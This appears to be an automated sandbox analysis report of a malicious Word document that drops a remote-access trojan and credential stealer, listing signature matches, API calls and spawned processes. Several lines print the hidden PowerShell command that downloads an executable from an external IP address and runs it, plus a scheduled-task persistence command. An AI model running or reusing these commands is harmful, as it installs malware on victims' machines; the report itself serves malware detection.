            Source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000002.426889851.00000000001E0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
            Source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000005.00000002.429130471.0000000000260000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
            Source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: Process Memory Space: powershell.exe PID: 1868, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
            Source: Process Memory Space: powershell.exe PID: 2968, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: String function: 004035E5 appears 40 times
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: String function: 00410969 appears 47 times
            Source: doc[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: doc.exe.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: maBdogbw.exe.9.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$talogue_2021_samples_list_revise_ol.docJump to behavior
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@23/22@0/3
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004130B3 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,
            Source: C:\Users\user\AppData\Roaming\doc.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: catalogue_2021_samples_list_revise_ol.docVirustotal: Detection: 44%
            Source: catalogue_2021_samples_list_revise_ol.docReversingLabs: Detection: 31%
            Source: C:\Users\user\AppData\Roaming\doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................2.....p.........2.......-.....`I/........v.....................K6.....................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k......................R.............}..v....p.......0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.}..............#Z.....6.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k....`.................R.............}..v............0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.R.............}..v............0.}..............#Z.....".......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k......................R.............}..v....(.......0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............Q..k....0'Z...............R.............}..v............0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k......................R.............}..v....(.......0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............Q..k....0'Z...............R.............}..v............0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k......................R.............}..v....(.......0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'.`.......0.}..............#Z.....8.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k......................R.............}..v............0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............Q..k......................R.............}..v....X.......0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k......................R.............}..v............0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.@.....w...............Q..k....0'Z...............R.............}..v............0.}.....................f.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k......................R.............}..v............0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......Q..k....0'Z...............R.............}..v............0.}..............#Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....H.................R.............}..v............0.}..............$Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.@......................y.k......Z...............R.............}..v....0N......0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k.....N................R.............}..v....hO......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................y.k......Z...............R.............}..v.....U......0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k.....V................R.............}..v....0W......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v....@[......0.}.............x.Z.....$.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k.....[................R.............}..v....x\......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................y.k......Z...............R.............}..v....@c......0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k.....c................R.............}..v....xd......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................y.k......Z...............R.............}..v....@k......0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k.....k................R.............}..v....xl......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'..p......0.}.............x.Z.....8.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k....hq................R.............}..v.....q......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................y.k......Z...............R.............}..v.....x......0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k....hy................R.............}..v.....y......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....~......0.}.............x.Z.....&.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k.....~................R.............}..v....8.......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................y.k......Z...............R.............}..v............0.}.............................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......................R.............}..v....8.......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.}.............x.Z.....<.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k....0.................R.............}..v............0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........y.k......Z...............R.............}..v....@.......0.}.............x.Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......................R.............}..v....x.......0.}...............Z.............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................2.....p.........2.......-.....`I/........v.....................K6.....................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................/#k....H.................R.............}..v............0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.}.............x.f.....6.......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................/#k......................R.............}..v....8.......0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.R.............}..v....H.......0.}.............x.f.....".......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................/#k......................R.............}..v............0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................#k....."f...............R.............}..v....H.......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................/#k......................R.............}..v............0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................#k....."f...............R.............}..v....H.......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................/#k......................R.............}..v............0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'.........0.}.............x.f.....8.......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................/#k....p.................R.............}..v............0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................#k......................R.............}..v............0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................/#k....h.................R.............}..v............0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.@.....w.................#k....."f...............R.............}..v.... .......0.}.....................f.......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................/#k......................R.............}..v....X.......0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........#k....."f...............R.............}..v............0.}.............x.f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../#k......................R.............}..v.... .......0.}.............. f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.@.......................#k....P.f...............R.............}..v.....Q......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k....@R................R.............}..v.....R......0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................#k....P.f...............R.............}..v....PY......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k.....Z................R.............}..v.....Z......0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v.....^......0.}...............f.....$.......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k....P_................R.............}..v....._......0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................#k....P.f...............R.............}..v.....f......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k....Pg................R.............}..v.....g......0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................#k....P.f...............R.............}..v.....n......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k....Po................R.............}..v.....o......0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c...e.x.e.'..t......0.}...............f.....8.......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k.....t................R.............}..v....@u......0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................#k....P.f...............R.............}..v.....|......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k.....|................R.............}..v....@}......0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....X.......0.}...............f.....&.......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k......................R.............}..v............0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................#k....P.f...............R.............}..v....X.......0.}.............................D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k......................R.............}..v............0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.}...............f.....<.......D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k......................R.............}..v............0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........#k....P.f...............R.............}..v............0.}...............f.............D...............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................k.#k....P.................R.............}..v............0.}...............f.............D...............
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................8...........E.R.R.O.R.:. ...................$...............................................8.".............................
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................8...........E.R.R.O.(.P.....................$.......................................................X.......x...............
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe 'C:\Users\user\AppData\Roaming\doc.exe'
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT'
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe 'C:\Users\user\AppData\Roaming\doc.exe'
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREA10.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040F80E CoInitializeSecurity,CoInitialize,CoCreateInstance,VariantInit,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Roaming\doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004120B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: Window RecorderWindow detected: More than 3 window changes detected
